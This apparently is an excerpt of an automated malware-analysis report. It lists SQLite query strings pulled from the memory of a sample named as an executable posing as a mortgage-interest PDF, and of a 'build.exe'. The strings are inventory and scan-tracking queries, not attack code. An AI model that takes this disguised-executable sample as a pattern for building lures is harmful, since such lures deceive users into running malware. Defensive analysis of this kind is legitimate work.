Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Status != 'deleted' AND LastSentTime != 0 AND AppId IN (SELECT DISTINCT x.AppId FROM File f INNER JOIN ApplicationFile x ON (x.FileId = f.FileId) WHERE f.Stale = 'true');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO Platform (StatusId, device_os_platform, device_os_servicepack, device_os_version) VALUES ((SELECT StatusId FROM Platform WHERE StatusId=?1),?10, ?11, ?12);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status='deleted',LastSentTime=0 WHERE Path=?1 AND Sha256 != ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status='deleted',LastSentTime=0 WHERE Path=?1 AND Sha256 = ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Process SET LastSentTime=?8 WHERE LastSentTime<=?6;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Application WHERE AppId IN (SELECT AppId FROM ApplicationInstallLocation WHERE InstallLocation=?1) AND Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0SELECT 'CREATE UNIQUE INDEX vacuum_db.' \|\| substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'SELECT 'CREATE INDEX vacuum_db.' \|\| substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' SELECT 'CREATE TABLE vacuum_db.' \|\| substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0BEGIN EXCLUSIVE;PRAGMA vacuum_db.synchronous=OFFATTACH '' AS vacuum_db;cannot VACUUM from within a transactionwin32
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ApplicationInstallLocation WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE IsScriptFile=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId FROM ApplicationFile WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE ScanHistory SET LastDiscoverySourceScanned=?15,LastLocationScanned=?20, LastUpdated=?70 WHERE ScanActive='true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status='deleted',LastSentTime=0 WHERE AppId IN (SELECT DISTINCT AppId FROM ApplicationInstallLocation WHERE (InstallLocation=?1) AND (Version=?2));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT COUNT(*) FROM Application WHERE status != 'unchanged' AND AppIsCompletelyScanned = 'true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET MSIfile=?11,ProcessName=?2,Stale=?5,LastUpdated=?70,LastSentTime=?71 WHERE MSIfile=?55 AND Path=?1 AND Sha256 != ?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO DatabaseStatus (StatusId, InitialScanCount, InitialScanCountTime, ScanPerformedAfterEntitlement, ScanPerformedAfterEntitlementTime, DeltaSequenceNumber, FileSequenceNumber, OperationIsActive) VALUES ((SELECT StatusId FROM DatabaseStatus WHERE StatusId=?1),?10, ?11,?20, ?21,?31, ?32,?41);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET ARPRegistryKey=?1 WHERE AppId=?2;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ScanHistory;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Application WHERE Status=?4 AND Stale LIKE ?5 AND AppIsCompletelyScanned=?7;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status='modified',Stale='true',LastUpdated=?70,LastSentTime=?71 WHERE (Status != 'new') AND (Status != 'deleted') AND AppId IN (SELECT DISTINCT x.AppId FROM File f INNER JOIN ApplicationFile x ON (x.FileId = f.FileId) WHERE f.Status != 'unchanged');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Service WHERE FileId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId FROM File WHERE Stale=?5;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT Path,SHA256,Status FROM File WHERE FileId NOT IN (SELECT FileId From ApplicationFile) AND IsScriptFile=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET AppIsCompletelyScanned=?7,LastUpdated=?70 WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status='new' WHERE Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS BlackCache (filepath varchar(300) UNIQUE,atime char(255));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS MasterApplication (MasterAppIdinteger PRIMARY KEY,Nametext,Version text,Architecture text,InstallLocationtext,AppIdinteger,FOREIGN KEY (AppId) REFERENCES Application(AppId));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status=?9,LastSentTime=?8 WHERE AppIsCompletelyScanned = 'true' AND Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Path=?1 AND Sha256 LIKE ?4 AND Status != 'new' AND Status != 'deleted' AND (LastSentTime != 0 OR Status = 'unchanged');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status=?9,LastSentTime=?8 WHERE Status != 'unchanged' AND Status != 'deleted' AND AppIsCompletelyScanned = 'true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT Path,SHA256,Status FROM File WHERE FileId NOT IN (SELECT FileId From ApplicationFile) AND IsScriptFile=?4 AND Status != 'unchanged';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status=?9,LastSentTime=?8 WHERE IsScriptFile=?4 AND Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ScanHistory (ScanId integer PRIMARY KEY,AppCtrlIniSHA256text,SectionNametext,LastDiscoverySourceScannedtext,LastLocationScannedtext,ScanStatustext,ScanActivetext,LastUpdatedinteger,UNIQUE (AppCtrlIniSHA256,SectionName));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status='deleted',LastSentTime=0 WHERE Stale='true';
